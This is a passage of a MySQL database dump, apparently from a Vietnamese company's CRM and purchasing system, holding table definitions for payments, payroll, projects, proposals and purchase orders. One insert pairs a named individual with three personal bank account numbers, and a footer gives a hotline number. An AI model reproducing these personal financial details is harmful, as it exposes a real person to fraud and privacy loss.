(733, 'invoice_pdf_settings', '{\"cover_page\":{\"align_from_top\":\"\",\"align_from_left\":\"\",\"image\":\"\"},\"closing_page\":{\"align_from_top\":\"\",\"align_from_left\":\"\",\"image\":\"\"},\"items_table\":{\"heading_row_bg_color\":\"#025488\",\"heading_row_text_color\":\"\",\"odd_rows_bg_color\":\"#f1f1f1\",\"odd_rows_text_color\":\"\",\"even_rows_bg_color\":\"\",\"even_rows_text_color\":\"\",\"total_row_bg_color\":\"\",\"total_row_text_color\":\"\"},\"header\":{\"image\":\"\",\"text\":\"<p><span style=\\\"font-family:arial, helvetica, sans-serif;font-size:8pt;\\\">WIT<br><\\/span><\\/p>\"},\"footer\":{\"image\":\"\",\"text\":\"<p><span style=\\\"font-family:arial, helvetica, sans-serif;font-size:8pt;\\\">Tổ chức đào tạo WIT - Premium Overhead Fans - Hotline: 0909899367<br><\\/span><\\/p>\\n<p><span style=\\\"font-family:arial, helvetica, sans-serif;font-size:8pt;\\\"><span style=\\\"font-family:arial, helvetica, sans-serif;\\\">&#160;<\\/span><\\/span><\\/p>\"}}', 1),
(734, 'estimate_item_table_custom_style', '[{\"id\":\"estimate_heading_row_bg_color\",\"color\":\"\"},{\"id\":\"estimate_heading_row_text_color\",\"color\":\"\"},{\"id\":\"estimate_odd_rows_bg_color\",\"color\":\"\"},{\"id\":\"estimate_odd_rows_text_color\",\"color\":\"\"},{\"id\":\"estimate_even_rows_bg_color\",\"color\":\"\"},{\"id\":\"estimate_even_rows_text_color\",\"color\":\"\"},{\"id\":\"estimate_total_row_bg_color\",\"color\":\"\"},{\"id\":\"estimate_total_row_text_color\",\"color\":\"\"}]', 1),
(735, 'estimate_pdf_settings', '{\"cover_page\":{\"align_from_top\":\"\",\"align_from_left\":\"\",\"image\":\"\"},\"closing_page\":{\"align_from_top\":\"\",\"align_from_left\":\"\",\"image\":\"\",\"text\":\"<p><img src=\\\"https:\\/\\/hgphome.com\\/media\\/ham-02.png\\\" width=\\\"1876\\\" height=\\\"1350\\\" alt=\\\"\\\"><\\/p>\"},\"items_table\":{\"heading_row_bg_color\":\"\",\"heading_row_text_color\":\"\",\"odd_rows_bg_color\":\"\",\"odd_rows_text_color\":\"\",\"even_rows_bg_color\":\"\",\"even_rows_text_color\":\"\",\"total_row_bg_color\":\"\",\"total_row_text_color\":\"\"},\"header\":{\"image\":\"\"},\"footer\":{\"image\":\"\"}}', 1),
(736, 'proposals_item_table_custom_style', '[{\"id\":\"proposals_heading_row_bg_color\",\"color\":\"\"},{\"id\":\"proposals_heading_row_text_color\",\"color\":\"\"},{\"id\":\"proposals_odd_rows_bg_color\",\"color\":\"\"},{\"id\":\"proposals_odd_rows_text_color\",\"color\":\"\"},{\"id\":\"proposals_even_rows_bg_color\",\"color\":\"\"},{\"id\":\"proposals_even_rows_text_color\",\"color\":\"\"},{\"id\":\"proposals_total_row_bg_color\",\"color\":\"\"},{\"id\":\"proposals_total_row_text_color\",\"color\":\"\"}]', 1),
(737, 'proposals_pdf_settings', '{\"cover_page\":{\"align_from_top\":\"\",\"align_from_left\":\"\",\"image\":\"\"},\"closing_page\":{\"align_from_top\":\"\",\"align_from_left\":\"\",\"image\":\"\",\"text\":\"<p><img src=\\\"https:\\/\\/hgphome.com\\/media\\/ham-02.png\\\" width=\\\"1876\\\" height=\\\"1350\\\" alt=\\\"\\\"><\\/p>\\n<p><img src=\\\"https:\\/\\/hgphome.com\\/media\\/ham-03.png\\\" width=\\\"1876\\\" height=\\\"1350\\\" alt=\\\"\\\"><\\/p>\\n<p><img src=\\\"https:\\/\\/hgphome.com\\/media\\/ham-07.png\\\" width=\\\"1876\\\" height=\\\"1351\\\" alt=\\\"\\\"><\\/p>\\n<p><img src=\\\"https:\\/\\/hgphome.com\\/media\\/ham-01.png\\\" width=\\\"1875\\\" height=\\\"1350\\\" alt=\\\"\\\"><\\/p>\"},\"items_table\":{\"heading_row_bg_color\":\"\",\"heading_row_text_color\":\"\",\"odd_rows_bg_color\":\"\",\"odd_rows_text_color\":\"\",\"even_rows_bg_color\":\"\",\"even_rows_text_color\":\"\",\"total_row_bg_color\":\"\",\"total_row_text_color\":\"\"},\"header\":{\"image\":\"\"},\"footer\":{\"image\":\"\"}}', 1);

-- --------------------------------------------------------

--
-- Table structure for table `tblpayment_attempts`
--

CREATE TABLE `tblpayment_attempts` (
  `id` int(10) UNSIGNED NOT NULL,
  `reference` varchar(100) NOT NULL,
  `invoice_id` int(11) NOT NULL,
  `amount` double NOT NULL,
  `fee` double NOT NULL,
  `payment_gateway` varchar(100) NOT NULL,
  `created_at` datetime NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblpayment_modes`
--

CREATE TABLE `tblpayment_modes` (
  `id` int(11) NOT NULL,
  `name` varchar(100) NOT NULL,
  `description` text DEFAULT NULL,
  `show_on_pdf` int(11) NOT NULL DEFAULT 0,
  `invoices_only` int(11) NOT NULL DEFAULT 0,
  `expenses_only` int(11) NOT NULL DEFAULT 0,
  `selected_by_default` int(11) NOT NULL DEFAULT 1,
  `active` tinyint(1) NOT NULL DEFAULT 1
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

--
-- Dumping data for table `tblpayment_modes`
--

INSERT INTO `tblpayment_modes` (`id`, `name`, `description`, `show_on_pdf`, `invoices_only`, `expenses_only`, `selected_by_default`, `active`) VALUES
(1, 'Tài khoản thụ hưởng CÁ NHÂN', 'HO VAN CONG <br />\n*STK 9012303979 - Vietcombank <br />\n*STK 0913123860 - VPBank  <br />\n*STK 84913123860 - MBBank', 1, 1, 0, 1, 1),
(2, 'Thu tiền mặt COD - Giao hàng mới thanh toán', 'COD: giao hàng thanh toán tiền trực tiếp ', 1, 1, 0, 1, 0),
(3, 'Trả góp 0% qua thẻ Visa/Master Card', 'Thu tiền qua thẻ POS (Visa/Master Card) <br />\nQuý khách mua trả góp qua thẻ ', 1, 1, 0, 1, 1),
(4, 'Tài khoản thụ hưởng CÔNG TY', 'CÔNG TY CỔ PHẦN WIT', 1, 1, 0, 1, 1);

-- --------------------------------------------------------

--
-- Table structure for table `tblpayroll_table`
--

CREATE TABLE `tblpayroll_table` (
  `id` int(10) UNSIGNED NOT NULL,
  `payroll_month` date NOT NULL,
  `payroll_type` int(10) UNSIGNED DEFAULT NULL,
  `template_data` longtext DEFAULT NULL,
  `status` int(10) UNSIGNED DEFAULT 0 COMMENT '1:đã chốt 0:chưa chốt'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblpayroll_type`
--

CREATE TABLE `tblpayroll_type` (
  `id` int(10) UNSIGNED NOT NULL,
  `payroll_type_name` varchar(100) NOT NULL,
  `department_id` longtext DEFAULT NULL,
  `role_id` longtext DEFAULT NULL,
  `position_id` longtext DEFAULT NULL,
  `salary_form_id` int(10) UNSIGNED DEFAULT NULL COMMENT '1:Chính 2:Phụ cấp',
  `manager_id` int(10) UNSIGNED DEFAULT NULL,
  `follower_id` int(10) UNSIGNED DEFAULT NULL,
  `template` longtext DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblpinned_projects`
--

CREATE TABLE `tblpinned_projects` (
  `id` int(11) NOT NULL,
  `project_id` int(11) NOT NULL,
  `staff_id` int(11) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblprojectdiscussioncomments`
--

CREATE TABLE `tblprojectdiscussioncomments` (
  `id` int(11) NOT NULL,
  `discussion_id` int(11) NOT NULL,
  `discussion_type` varchar(10) NOT NULL,
  `parent` int(11) DEFAULT NULL,
  `created` datetime NOT NULL,
  `modified` datetime DEFAULT NULL,
  `content` text NOT NULL,
  `staff_id` int(11) NOT NULL,
  `contact_id` int(11) DEFAULT 0,
  `fullname` varchar(191) DEFAULT NULL,
  `file_name` varchar(191) DEFAULT NULL,
  `file_mime_type` varchar(70) DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblprojectdiscussions`
--

CREATE TABLE `tblprojectdiscussions` (
  `id` int(11) NOT NULL,
  `project_id` int(11) NOT NULL,
  `subject` varchar(191) NOT NULL,
  `description` text NOT NULL,
  `show_to_customer` tinyint(1) NOT NULL DEFAULT 0,
  `datecreated` datetime NOT NULL,
  `last_activity` datetime DEFAULT NULL,
  `staff_id` int(11) NOT NULL DEFAULT 0,
  `contact_id` int(11) NOT NULL DEFAULT 0
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblprojects`
--

CREATE TABLE `tblprojects` (
  `id` int(11) NOT NULL,
  `name` varchar(191) NOT NULL,
  `description` text DEFAULT NULL,
  `status` int(11) NOT NULL DEFAULT 0,
  `clientid` int(11) NOT NULL,
  `billing_type` int(11) NOT NULL,
  `start_date` date NOT NULL,
  `deadline` date DEFAULT NULL,
  `project_created` date NOT NULL,
  `date_finished` datetime DEFAULT NULL,
  `progress` int(11) DEFAULT 0,
  `progress_from_tasks` int(11) NOT NULL DEFAULT 1,
  `project_cost` decimal(15,2) DEFAULT NULL,
  `project_rate_per_hour` decimal(15,2) DEFAULT NULL,
  `estimated_hours` decimal(15,2) DEFAULT NULL,
  `addedfrom` int(11) NOT NULL,
  `contact_notification` int(11) DEFAULT 1,
  `notify_contacts` text DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblproject_activity`
--

CREATE TABLE `tblproject_activity` (
  `id` int(11) NOT NULL,
  `project_id` int(11) NOT NULL,
  `staff_id` int(11) NOT NULL DEFAULT 0,
  `contact_id` int(11) NOT NULL DEFAULT 0,
  `fullname` varchar(100) DEFAULT NULL,
  `visible_to_customer` int(11) NOT NULL DEFAULT 0,
  `description_key` varchar(191) NOT NULL COMMENT 'Language file key',
  `additional_data` text DEFAULT NULL,
  `dateadded` datetime NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblproject_files`
--

CREATE TABLE `tblproject_files` (
  `id` int(11) NOT NULL,
  `file_name` varchar(191) NOT NULL,
  `original_file_name` mediumtext DEFAULT NULL,
  `subject` varchar(191) DEFAULT NULL,
  `description` text DEFAULT NULL,
  `filetype` varchar(50) DEFAULT NULL,
  `dateadded` datetime NOT NULL,
  `last_activity` datetime DEFAULT NULL,
  `project_id` int(11) NOT NULL,
  `visible_to_customer` tinyint(1) DEFAULT 0,
  `staffid` int(11) NOT NULL,
  `contact_id` int(11) NOT NULL DEFAULT 0,
  `external` varchar(40) DEFAULT NULL,
  `external_link` text DEFAULT NULL,
  `thumbnail_link` text DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblproject_members`
--

CREATE TABLE `tblproject_members` (
  `id` int(11) NOT NULL,
  `project_id` int(11) NOT NULL,
  `staff_id` int(11) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblproject_notes`
--

CREATE TABLE `tblproject_notes` (
  `id` int(11) NOT NULL,
  `project_id` int(11) NOT NULL,
  `content` text NOT NULL,
  `staff_id` int(11) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblproject_settings`
--

CREATE TABLE `tblproject_settings` (
  `id` int(11) NOT NULL,
  `project_id` int(11) NOT NULL,
  `name` varchar(100) NOT NULL,
  `value` text DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblproposals`
--

CREATE TABLE `tblproposals` (
  `id` int(11) NOT NULL,
  `subject` varchar(191) DEFAULT NULL,
  `content` longtext DEFAULT NULL,
  `addedfrom` int(11) NOT NULL,
  `datecreated` datetime NOT NULL,
  `total` decimal(15,2) DEFAULT NULL,
  `subtotal` decimal(15,2) NOT NULL,
  `total_tax` decimal(15,2) NOT NULL DEFAULT 0.00,
  `adjustment` decimal(15,2) DEFAULT NULL,
  `discount_percent` decimal(15,2) NOT NULL,
  `discount_total` decimal(15,2) NOT NULL,
  `discount_type` varchar(30) DEFAULT NULL,
  `show_quantity_as` int(11) NOT NULL DEFAULT 1,
  `currency` int(11) NOT NULL,
  `open_till` date DEFAULT NULL,
  `date` date NOT NULL,
  `rel_id` int(11) DEFAULT NULL,
  `rel_type` varchar(40) DEFAULT NULL,
  `assigned` int(11) DEFAULT NULL,
  `hash` varchar(32) NOT NULL,
  `proposal_to` varchar(191) DEFAULT NULL,
  `project_id` int(11) DEFAULT NULL,
  `country` int(11) NOT NULL DEFAULT 0,
  `zip` varchar(50) DEFAULT NULL,
  `state` varchar(100) DEFAULT NULL,
  `city` varchar(100) DEFAULT NULL,
  `address` varchar(200) DEFAULT NULL,
  `email` varchar(150) DEFAULT NULL,
  `phone` varchar(50) DEFAULT NULL,
  `allow_comments` tinyint(1) NOT NULL DEFAULT 1,
  `status` int(11) NOT NULL,
  `estimate_id` int(11) DEFAULT NULL,
  `invoice_id` int(11) DEFAULT NULL,
  `date_converted` datetime DEFAULT NULL,
  `pipeline_order` int(11) DEFAULT 1,
  `is_expiry_notified` int(11) NOT NULL DEFAULT 0,
  `acceptance_firstname` varchar(50) DEFAULT NULL,
  `acceptance_lastname` varchar(50) DEFAULT NULL,
  `acceptance_email` varchar(100) DEFAULT NULL,
  `acceptance_date` datetime DEFAULT NULL,
  `acceptance_ip` varchar(40) DEFAULT NULL,
  `signature` varchar(40) DEFAULT NULL,
  `short_link` varchar(100) DEFAULT NULL,
  `processing` text DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblproposal_comments`
--

CREATE TABLE `tblproposal_comments` (
  `id` int(11) NOT NULL,
  `content` mediumtext DEFAULT NULL,
  `proposalid` int(11) NOT NULL,
  `staffid` int(11) NOT NULL,
  `dateadded` datetime NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblprovince_city`
--

CREATE TABLE `tblprovince_city` (
  `id` int(11) NOT NULL,
  `province_code` varchar(45) NOT NULL,
  `province_name` varchar(200) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblpurchase_option`
--

CREATE TABLE `tblpurchase_option` (
  `option_id` int(10) UNSIGNED NOT NULL,
  `option_name` varchar(200) NOT NULL,
  `option_val` longtext DEFAULT NULL,
  `auto` tinyint(1) DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

--
-- Dumping data for table `tblpurchase_option`
--

INSERT INTO `tblpurchase_option` (`option_id`, `option_name`, `option_val`, `auto`) VALUES
(1, 'purchase_order_setting', '1', 1),
(2, 'pur_order_prefix', '#PO', 1),
(3, 'next_po_number', '1', 1),
(4, 'date_reset_number', '2023-06-01', 1),
(5, 'pur_request_prefix', '#PR', 1),
(6, 'next_pr_number', '3', 1),
(7, 'date_reset_pr_number', '', 1),
(8, 'pur_inv_prefix', '#INV', 1),
(9, 'next_inv_number', '1', 1),
(10, 'create_invoice_by', 'contract', 1),
(11, 'item_by_vendor', '1', 1),
(12, 'terms_and_conditions', '', 1),
(13, 'vendor_note', '', 1);

-- --------------------------------------------------------

--
-- Table structure for table `tblpur_activity_log`
--

CREATE TABLE `tblpur_activity_log` (
  `id` int(11) NOT NULL,
  `rel_id` int(11) NOT NULL,
  `rel_type` varchar(45) NOT NULL,
  `staffid` int(11) DEFAULT NULL,
  `date` datetime DEFAULT NULL,
  `note` text DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblpur_approval_details`
--

CREATE TABLE `tblpur_approval_details` (
  `id` int(11) NOT NULL,
  `rel_id` int(11) NOT NULL,
  `rel_type` varchar(45) NOT NULL,
  `staffid` varchar(45) DEFAULT NULL,
  `approve` varchar(45) DEFAULT NULL,
  `note` text DEFAULT NULL,
  `date` datetime DEFAULT NULL,
  `approve_action` varchar(255) DEFAULT NULL,
  `reject_action` varchar(255) DEFAULT NULL,
  `approve_value` varchar(255) DEFAULT NULL,
  `reject_value` varchar(255) DEFAULT NULL,
  `staff_approve` int(11) DEFAULT NULL,
  `action` varchar(45) DEFAULT NULL,
  `sender` int(11) DEFAULT NULL,
  `date_send` datetime DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblpur_approval_setting`
--

CREATE TABLE `tblpur_approval_setting` (
  `id` int(11) NOT NULL,
  `name` varchar(255) NOT NULL,
  `related` varchar(255) NOT NULL,
  `setting` longtext NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci;

--
-- Dumping data for table `tblpur_approval_setting`
--

INSERT INTO `tblpur_approval_setting` (`id`, `name`, `related`, `setting`) VALUES
(1, 'Phê duyệt mua hàng', 'pur_request', '[{\"approver\":\"staff\",\"staff\":\"2\",\"action\":\"approve\"}]'),
(2, 'Phê duyệt thanh toán', 'payment_request', '[{\"approver\":\"staff\",\"staff\":\"\",\"action\":\"approve\"}]');

-- --------------------------------------------------------

--
-- Table structure for table `tblpur_comments`
--

CREATE TABLE `tblpur_comments` (
  `id` int(10) UNSIGNED NOT NULL,
  `content` mediumtext DEFAULT NULL,
  `rel_type` varchar(50) NOT NULL,
  `rel_id` int(11) DEFAULT NULL,
  `staffid` int(11) NOT NULL,
  `dateadded` datetime NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblpur_contacts`
--

CREATE TABLE `tblpur_contacts` (
  `id` int(10) UNSIGNED NOT NULL,
  `userid` int(11) NOT NULL,
  `is_primary` int(11) NOT NULL DEFAULT 1,
  `firstname` varchar(191) NOT NULL,
  `lastname` varchar(191) NOT NULL,
  `email` varchar(100) NOT NULL,
  `phonenumber` varchar(100) NOT NULL,
  `title` varchar(100) DEFAULT NULL,
  `datecreated` datetime NOT NULL,
  `password` varchar(255) DEFAULT NULL,
  `new_pass_key` varchar(32) DEFAULT NULL,
  `new_pass_key_requested` datetime DEFAULT NULL,
  `email_verified_at` datetime DEFAULT NULL,
  `email_verification_key` varchar(32) DEFAULT NULL,
  `email_verification_sent_at` datetime DEFAULT NULL,
  `last_ip` varchar(40) DEFAULT NULL,
  `last_login` datetime DEFAULT NULL,
  `last_password_change` datetime DEFAULT NULL,
  `active` tinyint(1) NOT NULL DEFAULT 1,
  `profile_image` varchar(191) DEFAULT NULL,
  `direction` varchar(3) DEFAULT NULL,
  `invoice_emails` tinyint(1) NOT NULL DEFAULT 1,
  `estimate_emails` tinyint(1) NOT NULL DEFAULT 1,
  `credit_note_emails` tinyint(1) NOT NULL DEFAULT 1,
  `contract_emails` tinyint(1) NOT NULL DEFAULT 1,
  `task_emails` tinyint(1) NOT NULL DEFAULT 1,
  `project_emails` tinyint(1) NOT NULL DEFAULT 1,
  `ticket_emails` tinyint(1) NOT NULL DEFAULT 1
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblpur_contracts`
--

CREATE TABLE `tblpur_contracts` (
  `id` int(10) UNSIGNED NOT NULL,
  `contract_number` varchar(200) NOT NULL,
  `contract_name` varchar(200) NOT NULL,
  `content` longtext DEFAULT NULL,
  `vendor` int(11) NOT NULL,
  `pur_order` int(11) NOT NULL,
  `contract_value` decimal(15,2) DEFAULT NULL,
  `start_date` date NOT NULL,
  `end_date` date DEFAULT NULL,
  `buyer` int(11) DEFAULT NULL,
  `time_payment` date DEFAULT NULL,
  `add_from` int(11) NOT NULL,
  `signed` int(11) NOT NULL DEFAULT 0,
  `note` longtext DEFAULT NULL,
  `signer` int(11) DEFAULT NULL,
  `signed_date` date DEFAULT NULL,
  `signed_status` varchar(50) DEFAULT NULL,
  `service_category` text DEFAULT NULL,
  `project` int(11) DEFAULT NULL,
  `payment_terms` text DEFAULT NULL,
  `payment_amount` decimal(15,2) DEFAULT NULL,
  `payment_cycle` varchar(50) DEFAULT NULL,
  `department` int(11) DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblpur_debits`
--

CREATE TABLE `tblpur_debits` (
  `id` int(10) UNSIGNED NOT NULL,
  `invoice_id` int(11) DEFAULT NULL,
  `debit_id` int(11) DEFAULT NULL,
  `staff_id` int(11) DEFAULT NULL,
  `date_applied` datetime DEFAULT NULL,
  `date` date DEFAULT NULL,
  `amount` decimal(15,2) DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblpur_debits_refunds`
--

CREATE TABLE `tblpur_debits_refunds` (
  `id` int(10) UNSIGNED NOT NULL,
  `debit_note_id` int(11) DEFAULT NULL,
  `staff_id` int(11) DEFAULT NULL,
  `refunded_on` date DEFAULT NULL,
  `payment_mode` varchar(40) DEFAULT NULL,
  `note` text DEFAULT NULL,
  `amount` decimal(15,2) DEFAULT NULL,
  `created_at` datetime DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblpur_debit_notes`
--

CREATE TABLE `tblpur_debit_notes` (
  `id` int(10) UNSIGNED NOT NULL,
  `vendorid` int(11) DEFAULT NULL,
  `deleted_vendor_name` varchar(100) DEFAULT NULL,
  `number` int(11) DEFAULT NULL,
  `prefix` varchar(50) DEFAULT NULL,
  `number_format` int(11) DEFAULT NULL,
  `datecreated` datetime DEFAULT NULL,
  `date` date DEFAULT NULL,
  `adminnote` text DEFAULT NULL,
  `terms` text DEFAULT NULL,
  `vendornote` text DEFAULT NULL,
  `currency` int(11) DEFAULT NULL,
  `subtotal` decimal(15,2) DEFAULT NULL,
  `total_tax` decimal(15,2) DEFAULT NULL,
  `total` decimal(15,2) DEFAULT NULL,
  `adjustment` decimal(15,2) DEFAULT NULL,
  `addedfrom` int(11) DEFAULT NULL,
  `status` int(11) DEFAULT NULL,
  `discount_percent` decimal(15,2) DEFAULT NULL,
  `discount_total` decimal(15,2) DEFAULT NULL,
  `discount_type` varchar(30) DEFAULT NULL,
  `billing_street` varchar(200) DEFAULT NULL,
  `billing_city` varchar(100) DEFAULT NULL,
  `billing_state` varchar(100) DEFAULT NULL,
  `billing_zip` varchar(100) DEFAULT NULL,
  `billing_country` int(11) DEFAULT NULL,
  `shipping_street` varchar(200) DEFAULT NULL,
  `shipping_city` varchar(100) DEFAULT NULL,
  `shipping_state` varchar(100) DEFAULT NULL,
  `shipping_zip` varchar(100) DEFAULT NULL,
  `shipping_country` int(11) DEFAULT NULL,
  `include_shipping` tinyint(1) DEFAULT NULL,
  `show_shipping_on_debit_note` tinyint(1) DEFAULT NULL,
  `show_quantity_as` int(11) DEFAULT NULL,
  `reference_no` varchar(100) DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblpur_estimates`
--

CREATE TABLE `tblpur_estimates` (
  `id` int(10) UNSIGNED NOT NULL,
  `sent` tinyint(1) NOT NULL DEFAULT 0,
  `datesend` datetime DEFAULT NULL,
  `vendor` int(11) NOT NULL,
  `deleted_vendor_name` varchar(100) DEFAULT NULL,
  `pur_request` int(11) DEFAULT NULL,
  `number` int(11) NOT NULL,
  `prefix` varchar(50) DEFAULT NULL,
  `number_format` int(11) NOT NULL DEFAULT 0,
  `hash` varchar(32) DEFAULT NULL,
  `datecreated` datetime NOT NULL,
  `date` date NOT NULL,
  `expirydate` date DEFAULT NULL,
  `currency` int(11) NOT NULL,
  `subtotal` decimal(15,2) NOT NULL,
  `total_tax` decimal(15,2) NOT NULL,
  `total` decimal(15,2) NOT NULL,
  `adjustment` decimal(15,2) DEFAULT NULL,
  `addedfrom` int(11) NOT NULL,
  `status` int(11) NOT NULL DEFAULT 1,
  `vendornote` text DEFAULT NULL,
  `adminnote` text DEFAULT NULL,
  `discount_percent` decimal(15,2) DEFAULT 0.00,
  `discount_total` decimal(15,2) DEFAULT 0.00,
  `discount_type` varchar(30) DEFAULT NULL,
  `invoiceid` int(11) DEFAULT NULL,
  `invoiced_date` datetime DEFAULT NULL,
  `terms` text DEFAULT NULL,
  `reference_no` varchar(100) DEFAULT NULL,
  `buyer` int(11) NOT NULL DEFAULT 0,
  `billing_street` varchar(200) DEFAULT NULL,
  `billing_city` varchar(100) DEFAULT NULL,
  `billing_state` varchar(100) DEFAULT NULL,
  `billing_zip` varchar(100) DEFAULT NULL,
  `billing_country` int(11) DEFAULT NULL,
  `shipping_street` varchar(200) DEFAULT NULL,
  `shipping_city` varchar(100) DEFAULT NULL,
  `shipping_state` varchar(100) DEFAULT NULL,
  `shipping_zip` varchar(100) DEFAULT NULL,
  `shipping_country` int(11) DEFAULT NULL,
  `include_shipping` tinyint(1) NOT NULL,
  `show_shipping_on_estimate` tinyint(1) NOT NULL DEFAULT 1,
  `show_quantity_as` int(11) NOT NULL DEFAULT 1,
  `pipeline_order` int(11) NOT NULL DEFAULT 0,
  `is_expiry_notified` int(11) NOT NULL DEFAULT 0,
  `acceptance_firstname` varchar(50) DEFAULT NULL,
  `acceptance_lastname` varchar(50) DEFAULT NULL,
  `acceptance_email` varchar(100) DEFAULT NULL,
  `acceptance_date` datetime DEFAULT NULL,
  `acceptance_ip` varchar(40) DEFAULT NULL,
  `signature` varchar(40) DEFAULT NULL,
  `make_a_contract` text DEFAULT NULL,
  `currency_rate` decimal(15,6) DEFAULT NULL,
  `from_currency` varchar(20) DEFAULT NULL,
  `to_currency` varchar(20) DEFAULT NULL,
  `shipping_fee` decimal(15,2) DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblpur_estimate_detail`
--

CREATE TABLE `tblpur_estimate_detail` (
  `id` int(11) NOT NULL,
  `pur_estimate` int(11) NOT NULL,
  `item_code` varchar(100) NOT NULL,
  `unit_id` int(11) DEFAULT NULL,
  `unit_price` decimal(15,2) DEFAULT NULL,
  `quantity` decimal(15,2) NOT NULL,
  `into_money` decimal(15,2) DEFAULT NULL,
  `tax` text DEFAULT NULL,
  `total` decimal(15,2) DEFAULT NULL,
  `total_money` decimal(15,2) DEFAULT NULL,
  `discount_money` decimal(15,2) DEFAULT NULL,
  `discount_%` decimal(15,2) DEFAULT NULL,
  `tax_value` decimal(15,2) DEFAULT NULL,
  `tax_rate` text DEFAULT NULL,
  `tax_name` text DEFAULT NULL,
  `item_name` text DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblpur_invoices`
--

CREATE TABLE `tblpur_invoices` (
  `id` int(10) UNSIGNED NOT NULL,
  `number` int(11) NOT NULL,
  `invoice_number` text DEFAULT NULL,
  `invoice_date` date DEFAULT NULL,
  `subtotal` decimal(15,2) DEFAULT NULL,
  `tax_rate` int(11) DEFAULT NULL,
  `tax` decimal(15,2) DEFAULT NULL,
  `total` decimal(15,2) DEFAULT NULL,
  `contract` int(11) DEFAULT NULL,
  `vendor` int(11) DEFAULT NULL,
  `transactionid` mediumtext DEFAULT NULL,
  `transaction_date` date DEFAULT NULL,
  `payment_request_status` varchar(30) DEFAULT NULL,
  `payment_status` varchar(30) DEFAULT NULL,
  `vendor_note` text DEFAULT NULL,
  `adminnote` text DEFAULT NULL,
  `terms` text DEFAULT NULL,
  `add_from` int(11) DEFAULT NULL,
  `date_add` date DEFAULT NULL,
  `pur_order` int(11) DEFAULT NULL,
  `recurring` int(11) DEFAULT NULL,
  `recurring_type` varchar(10) DEFAULT NULL,
  `cycles` int(11) DEFAULT 0,
  `total_cycles` int(11) DEFAULT 0,
  `last_recurring_date` date DEFAULT NULL,
  `is_recurring_from` int(11) DEFAULT NULL,
  `duedate` date DEFAULT NULL,
  `add_from_type` varchar(20) DEFAULT NULL,
  `currency` int(11) DEFAULT 0,
  `discount_total` decimal(15,2) DEFAULT NULL,
  `discount_percent` decimal(15,2) DEFAULT NULL,
  `currency_rate` decimal(15,6) DEFAULT NULL,
  `from_currency` varchar(20) DEFAULT NULL,
  `to_currency` varchar(20) DEFAULT NULL,
  `shipping_fee` decimal(15,2) DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblpur_invoice_details`
--

CREATE TABLE `tblpur_invoice_details` (
  `id` int(11) NOT NULL,
  `pur_invoice` int(11) NOT NULL,
